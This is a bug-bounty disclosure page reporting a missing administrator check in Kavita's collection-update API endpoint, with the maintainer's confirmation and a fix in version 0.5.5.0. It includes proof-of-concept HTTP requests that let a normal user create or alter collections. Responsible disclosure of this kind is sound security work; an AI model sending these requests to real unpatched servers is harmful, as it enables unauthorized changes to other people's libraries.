We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

IDOR allows to create new collection or modify a existing one in kareadita/kavita

Valid

Reported on

Aug 8th 2022

Description

A normal user can create a new collection with the provided book ids or add new books to an existing collection, whose operations should be only executed by the administrator.

This is possible due to an missing administrative role check in the /api/collection/update-for-series API endpoint.

Proof of Concept

Create a new collection:

1 - Send the following request, where collectionTagId=0 attribute value, indicates the creation of a new collection and the seriesID array attribute contains all the book ids that will be added to the collection:

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":0,"collectionTagTitle":"Collection3","seriesIds":[1,2,3,4,5]}

Add new books to an existing collection:

1 - Send the following request, where collection-id value has the target collection id, and the seriesID array attribute contains all the new book ids that will be added to the collection:

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":<collection-id>,"collectionTagTitle":"New title","seriesIds":[3,4,5]}

Impact

An authenticated attacker can create a new collection or modify the contents of an existing one without any authentication or authorization checks.

We are processing your report and will contact the kareadita/kavita team within 24 hours. a year ago
We have contacted a member of the kareadita/kavita team and are waiting to hear back a year ago
kareadita/kavita maintainer has acknowledged this report a year ago
Joe Milazzo
a year ago

Maintainer

Is this on v0.5.4 only or on 0.5.4.2 (the new hotfix which addressed your last round of vulnerabilities)?

vultza modified the report
a year ago
vultza
a year ago

Researcher

It targets v0.5.4.2. I just modified the original report, because I submitted this report before the hotfix. The vulnerability still exists, missing an administrative check, but now is only possible if the attacker is authenticated as normal user.

Joe Milazzo validated this vulnerability a year ago

I did confirm it, one line of missing code. Fixed locally, planned for next Stable. Thanks again for the report.

vultza has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the kareadita/kavita team. We will try again in 7 days. a year ago
Joe Milazzo marked this as fixed in 0.5.5.0 with commit ae891c a year ago
Joe Milazzo has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation